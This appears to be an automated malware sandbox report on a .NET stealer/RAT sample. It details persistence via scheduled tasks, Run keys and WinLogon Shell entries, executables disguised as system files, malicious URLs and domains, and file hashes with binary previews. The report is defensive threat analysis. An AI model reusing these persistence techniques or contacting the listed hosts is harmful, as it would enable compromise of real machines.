                                        01:36:03Task SchedulerRun new task: apERZQztEJsqymITPFxguVe path: "C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe"
                                        01:36:03Task SchedulerRun new task: apERZQztEJsqymITPFxguVea path: "C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe"
                                        01:36:05Task SchedulerRun new task: lv961v43L3 path: "C:\Users\user\Desktop\lv961v43L3.exe"
                                        01:36:05Task SchedulerRun new task: lv961v43L3l path: "C:\Users\user\Desktop\lv961v43L3.exe"
                                        01:36:05Task SchedulerRun new task: StartMenuExperienceHost path: "C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe"
                                        01:36:05Task SchedulerRun new task: StartMenuExperienceHostS path: "C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe"
                                        01:36:05Task SchedulerRun new task: SystemSettings path: "C:\Users\Default User\SystemSettings.exe"
                                        01:36:05Task SchedulerRun new task: SystemSettingsS path: "C:\Users\Default User\SystemSettings.exe"
                                        01:36:07AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run apERZQztEJsqymITPFxguVe "C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe"
                                        01:36:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe"
                                        01:36:24AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SystemSettings "C:\Users\Default User\SystemSettings.exe"
                                        01:36:32AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run lv961v43L3 "C:\Users\user\Desktop\lv961v43L3.exe"
                                        01:36:40AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run apERZQztEJsqymITPFxguVe "C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe"
                                        01:36:48AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe"
                                        01:36:56AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SystemSettings "C:\Users\Default User\SystemSettings.exe"
                                        01:37:05AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run lv961v43L3 "C:\Users\user\Desktop\lv961v43L3.exe"
                                        01:37:13AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run apERZQztEJsqymITPFxguVe "C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe"
                                        01:37:21AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost "C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe"
                                        01:37:29AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run SystemSettings "C:\Users\Default User\SystemSettings.exe"
                                        01:37:37AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run lv961v43L3 "C:\Users\user\Desktop\lv961v43L3.exe"
                                        01:37:53AutostartRun: WinLogon Shell "C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe"
                                        01:38:02AutostartRun: WinLogon Shell "C:\Recovery\apERZQztEJsqymITPFxguVe.exe"
                                        01:38:10AutostartRun: WinLogon Shell "C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe"
                                        01:38:18AutostartRun: WinLogon Shell "C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe"
                                        19:36:28API Interceptor1941278x Sleep call for process: StartMenuExperienceHost.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        188.114.96.310092024150836 09.10.2024.vbeGet hashmaliciousFormBookBrowse
                                        • www.airgame.store/ojib/
                                        Hesap-hareketleriniz.exeGet hashmaliciousFormBookBrowse
                                        • www.cc101.pro/59fb/
                                        octux.exe.exeGet hashmaliciousUnknownBrowse
                                        • servicetelemetryserver.shop/api/index.php
                                        bX8NyyjOFz.exeGet hashmaliciousFormBookBrowse
                                        • www.rtprajalojago.live/2uvi/
                                        lWfpGAu3ao.exeGet hashmaliciousFormBookBrowse
                                        • www.serverplay.live/71nl/
                                        sa7Bw41TUq.exeGet hashmaliciousFormBookBrowse
                                        • www.cc101.pro/0r21/
                                        E_receipt.vbsGet hashmaliciousUnknownBrowse
                                        • paste.ee/d/VO2TX
                                        QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • filetransfer.io/data-package/fOmsJ2bL/download
                                        NARLOG 08.10.2024.exeGet hashmaliciousFormBookBrowse
                                        • www.thetahostthe.top/9r5x/
                                        RFQ 245801.exeGet hashmaliciousFormBookBrowse
                                        • www.j88.travel/c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+m2NwmP2xDXw&D4hl2=fT-dvVK08nUDKdF

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        863811cm.nyafka.topRRjzYVukzs.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        • 188.114.97.3

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        CLOUDFLARENETUShttp://fastuniversaldelivery.com/Get hashmaliciousUnknownBrowse
                                        • 172.67.15.14
                                        https://keysmix.com/Get hashmaliciousUnknownBrowse
                                        • 104.18.28.104
                                        file.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.53.8
                                        https://form.jotform.com/242814004861047Get hashmaliciousUnknownBrowse
                                        • 104.22.73.81
                                        https://megawishbone.nl/Get hashmaliciousHtmlDropperBrowse
                                        • 104.21.61.119
                                        https://soloist.ai/trigwiki23Get hashmaliciousUnknownBrowse
                                        • 104.16.123.96
                                        https://url.us.m.mimecastprotect.com/s/i78SCER7VQSp6YXNRsNfJF7h3vl?domain=customervoice.microsoft.comGet hashmaliciousHTMLPhisherBrowse
                                        • 104.21.53.126
                                        https://ercdz.com/Get hashmaliciousUnknownBrowse
                                        • 172.67.130.38
                                        https://ericstates.org/Get hashmaliciousUnknownBrowse
                                        • 162.159.140.229
                                        file.exeGet hashmaliciousLummaCBrowse
                                        • 172.67.206.204

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        C:\Recovery\apERZQztEJsqymITPFxguVe.exeRRjzYVukzs.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          C:\Users\user\Desktop\BQDZBqHE.logRRjzYVukzs.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            Q9AQFOA6YC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              fdsN8iw6WG.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                bR9BxUAkJW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  Q13mrh42kO.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    LbsPIL0buh.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      AvQTFKdsST.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        7xrBJ8v6sE.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                          Zn0uX5K1ez.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            VUZeEe6Nhz.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              C:\Users\Default\SystemSettings.exeRRjzYVukzs.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                Created / dropped Files

                                                                C:\Program Files (x86)\Microsoft\Edge\Application\CSC7685716E115C40A19F7FCCC6DF33F58B.TMP

                                                                Download File
                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                File Type:MSVC .res
                                                                Category:dropped
                                                                Size (bytes):1168
                                                                Entropy (8bit):4.448520842480604
                                                                Encrypted:false
                                                                SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                                MD5:B5189FB271BE514BEC128E0D0809C04E
                                                                SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                                SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                                SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                                Malicious:false
                                                                Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

                                                                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                Download File
                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):4608
                                                                Entropy (8bit):3.927765891145
                                                                Encrypted:false
                                                                SSDEEP:48:6omVtuxZ8RxeOAkFJOcV4MKe28dXqdkQvqBHfuulB+hnqXSfbNtm:CRxvxVx93avkxTkZzNt
                                                                MD5:87F1563C5BC4E7A82BC287F30A43C689
                                                                SHA1:0EAE3C3D3CE90FBCFB1F4E3B50EB49B6BD843F25
                                                                SHA-256:3043D286171EBD8D25373BB41822522FFA65B5F5406C73DF53B97D7870845C3F
                                                                SHA-512:6893DD5D2CC60B70DD966AC290177BE19952C837981369F56AEE6B8AE98576194D562EB4021359A07A7B1024C6909FFB7E80B5382754FC3F81DAB66DB6BA5ABA
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...St.g.............................'... ...@....@.. ....................................@.................................l'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..D.............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID...$... ...#Blob...........WU........%3................................................................

                                                                C:\Recovery\7b23a8b4123990

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:ASCII text, with very long lines (596), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):596
                                                                Entropy (8bit):5.884662759942331
                                                                Encrypted:false
                                                                SSDEEP:12:PvYwhi/PauKuIj60Ueb9jsNwn350kTLLLSo+nUT:PvYwU6uTm6YuNq0kqrnUT
                                                                MD5:CCE1924E83134EDCFA3F9E71FE72A944
                                                                SHA1:BC73879B86E0E4CC6E9D7AEA89CE6D4BABC4E1BA
                                                                SHA-256:D94D571B737002F247250E29DD357DC705683F807308915018029CDC7AABAA98
                                                                SHA-512:67409C42FF0B98D0BC6912AF6C91414A31C3BCEABB5B4E8167A226620056D36205087B01ACB4899E6373769750CAAA1EB22FD95F9B6D780A06550509298C1ED5
                                                                Malicious:false
                                                                Preview:EznC6PZLmuKsIR96m1xmwu0zxgWuFF1YOZi7lnbcAUmjHCMM5EgmsMyT8xPZ2oFg3vdtsCU8aVmbIRruUKzAjOpCkP8xYCjVOFpWicd3thMXjWKrFeErzF7oGbIdDgkYvQMDlVM2r5RCCRcNERs372fJIBPHTA0M7xmSKHFtSMA3x4ly84Yvyqa2vC4jFEiqFEEOoJD6L8lv1lVNabJYlEXRXthHNgoOnTys0WJy1ck0FpAJqrJo4JEBrx14l6tpUWHixnWERUhJdhMrtYagX9TdOxBDeOM5t5fsicWDUFWkm5hJlKLNfMSUDnTAlTjDImaiCdJQBWMRnt1TP2cUC8ZgnLo4JWcAfTbAe8GHA5LJAAqUv9us1OAJM450zOGp3LwUR0yQvVUHwQfmeTIJltJRSSxkDPRvygPzOWD5Ke7f43W6YSWfF7EKBeB8DOMfDiSQAqYHQN9HwnXZ50Lu3vp1bFxtUE16RbcVkF6s3OP287XYHlCMCcmR2by52pxLVCzULBz04d0ogx3erZmsBp3zzKdIQAzObDg5HDMGwMRjl7vEiUOdCEJqIAeBiqj4nmNcR7XnMf6zXUN2ZYk6

                                                                C:\Recovery\apERZQztEJsqymITPFxguVe.exe

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):3554304
                                                                Entropy (8bit):7.287632240829175
                                                                Encrypted:false
                                                                SSDEEP:98304:coqPT1rMFQMDUQU4ALqWEbtgktkwVl9vg:coqL1QFQMWDLQG2lm
                                                                MD5:76802A2F25A771332D8C00EE56975818
                                                                SHA1:2FA3D8E0A7D3285DA7894C68983FCFF150714559
                                                                SHA-256:C877D0B38B1A395B38FF44494EA2D5E6F826C751503AE8C3D90E3AFA9D6FF348
                                                                SHA-512:2BE48524833A7B8FD9D0DE7C8197DD57193AC058DE219148089624BD909D82D5277A16D934520AAEF695D0F7E67CFC8FEC284CDFA6EDCBE6C55D1056351A738A
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\apERZQztEJsqymITPFxguVe.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\apERZQztEJsqymITPFxguVe.exe, Author: Joe Security
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                Joe Sandbox View:
                                                                • Filename: RRjzYVukzs.exe, Detection: malicious, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F'.g.................46.........NS6.. ...`6...@.. ........................6...........@..................................S6.K....`6. .....................6...................................................... ............... ..H............text...T36.. ...46................. ..`.rsrc... ....`6......66.............@....reloc........6......:6.............@..B................0S6.....H...........................p+..R6......................................0..........(.... ........8........E....*...........9...8%...*(.... ....~....{....:....& ....8....(.... ....8....(.... ....~....{b...9....& ....8........0.......... ........8........E....k...........?...........8f...~....(Q... .... .... ....s....~....(U....... ........8........~....(Y...~....(]... ....?9... ....8x...8*... ....~....{....9_...& ....8T...r...ps....z*~....9.... ....~....{....:*...& ....8.....

                                                                C:\Recovery\apERZQztEJsqymITPFxguVe.exe:Zone.Identifier

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):26
                                                                Entropy (8bit):3.95006375643621
                                                                Encrypted:false
                                                                SSDEEP:3:ggPYV:rPYV
                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                Malicious:true
                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                C:\Users\Default\9e60a5f7a3bd80

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:ASCII text, with very long lines (615), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):615
                                                                Entropy (8bit):5.875939092492741
                                                                Encrypted:false
                                                                SSDEEP:12:T9IABximgoz8eD/TXJ0D+rrB9HsymGnk6Jp9Fofc1qDi1i:qABxFgS5LZFlLmk1FDKi1i
                                                                MD5:26F5D8C1E93F382F601F6C73CA5E6B65
                                                                SHA1:689DC24E15E6E6F818BDF8CD50B5C84AFDFF4D9C
                                                                SHA-256:BE7FC67170394BFA6121643690E3779482F7DA0C52C502ACF356EBF070E823B3
                                                                SHA-512:1AF19D87A484D2C4727BEB4C57D0364E852A62A4961A4EE1FC377DF5417C09EA5AFCF06EBD34D560DAC48BC557120DECBF014B57F1C9416D721C73AE868AE831
                                                                Malicious:false
                                                                Preview:5Fqj3OI7dMzelLEhigmasXgvEMo2FI8NT8MRCRS2XgJj3SJiNe1KZP3ij5erkQ2VNmKn9weROuDMN61wCFpkQyyEFosHwlSHoyWRHgja9k5pLqUmDsoekREZyGhUEXenc6hYkkpggOkq2J2YTFDE6xgXt6dB8OWmFSMPJ5BdDH8VqYhpNJB8TaqoZKpnHniR27kj6mPXDkByzKqUZyxzNXTpmiz8QXWZjrdsy7sl4n4sY1yPdUOT0tEfo57XwQHqOmPIr8gbFL4jclQutkf5JCi0n7E2AUyogOdwmqhfxxNoyeCDoMoLuLgLDYft4nauWQDOHdICCAHVz3CI5BOyqn3UrRtNLylKWdRhbx5LElJuELWJWXy3ZmEtXshzu41OY78VleqHFDtEdIQg5j1y9suuYhKsQGbKt4VGMAh1qrxW29QOcA4KCDOqNO6EU809mjUjxKT4CAIS4Y1ZR6QQLQHppo37Edhr0yuToqaSq9IC56wyWhwXrkxVbp3IQW0idacGohulf8jLIFut2EkgrJ9QAY29wSBUJjifeqKyxL2tBlMV4KQMvT1TaLFPpuyN6OCjgOOL3wtgRPOZMgElByjzsPESl4JCWoxwjmz

                                                                C:\Users\Default\SystemSettings.exe

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):3554304
                                                                Entropy (8bit):7.287632240829175
                                                                Encrypted:false
                                                                SSDEEP:98304:coqPT1rMFQMDUQU4ALqWEbtgktkwVl9vg:coqL1QFQMWDLQG2lm
                                                                MD5:76802A2F25A771332D8C00EE56975818
                                                                SHA1:2FA3D8E0A7D3285DA7894C68983FCFF150714559
                                                                SHA-256:C877D0B38B1A395B38FF44494EA2D5E6F826C751503AE8C3D90E3AFA9D6FF348
                                                                SHA-512:2BE48524833A7B8FD9D0DE7C8197DD57193AC058DE219148089624BD909D82D5277A16D934520AAEF695D0F7E67CFC8FEC284CDFA6EDCBE6C55D1056351A738A
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\SystemSettings.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\SystemSettings.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\SystemSettings.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\SystemSettings.exe, Author: Joe Security
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                Joe Sandbox View:
                                                                • Filename: RRjzYVukzs.exe, Detection: malicious, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F'.g.................46.........NS6.. ...`6...@.. ........................6...........@..................................S6.K....`6. .....................6...................................................... ............... ..H............text...T36.. ...46................. ..`.rsrc... ....`6......66.............@....reloc........6......:6.............@..B................0S6.....H...........................p+..R6......................................0..........(.... ........8........E....*...........9...8%...*(.... ....~....{....:....& ....8....(.... ....8....(.... ....~....{b...9....& ....8........0.......... ........8........E....k...........?...........8f...~....(Q... .... .... ....s....~....(U....... ........8........~....(Y...~....(]... ....?9... ....8x...8*... ....~....{....9_...& ....8T...r...ps....z*~....9.... ....~....{....:*...& ....8.....

                                                                C:\Users\Default\SystemSettings.exe:Zone.Identifier

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):26
                                                                Entropy (8bit):3.95006375643621
                                                                Encrypted:false
                                                                SSDEEP:3:ggPYV:rPYV
                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                Malicious:true
                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\StartMenuExperienceHost.exe.log

                                                                Download File
                                                                Process:C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                File Type:CSV text
                                                                Category:dropped
                                                                Size (bytes):847
                                                                Entropy (8bit):5.354334472896228
                                                                Encrypted:false
                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                Malicious:false
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SystemSettings.exe.log

                                                                Download File
                                                                Process:C:\Users\Default\SystemSettings.exe
                                                                File Type:CSV text
                                                                Category:dropped
                                                                Size (bytes):847
                                                                Entropy (8bit):5.354334472896228
                                                                Encrypted:false
                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                Malicious:false
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\apERZQztEJsqymITPFxguVe.exe.log

                                                                Download File
                                                                Process:C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe
                                                                File Type:CSV text
                                                                Category:dropped
                                                                Size (bytes):847
                                                                Entropy (8bit):5.354334472896228
                                                                Encrypted:false
                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                Malicious:false
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\lv961v43L3.exe.log

                                                                Download File
                                                                Process:C:\Users\user\Desktop\lv961v43L3.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1915
                                                                Entropy (8bit):5.363869398054153
                                                                Encrypted:false
                                                                SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4vb
                                                                MD5:0C47412B6C6EF6C70D4B96E4717A5D3B
                                                                SHA1:666FCC7898B52264D8A144600D7A3B0B59E39D66
                                                                SHA-256:0B3F6655476FA555F55859443DE496AF7279529D291EF9745C22C5C283B648F9
                                                                SHA-512:4E51FCBCA176BF9C5175478C23AE01445F13D9AC93771C7F73782AF9D98E8544A82BBFB5D3AA6E2F3ECF1EFB59A8466EB763A30BD795EFE78EE46429B2BEAC6C
                                                                Malicious:true
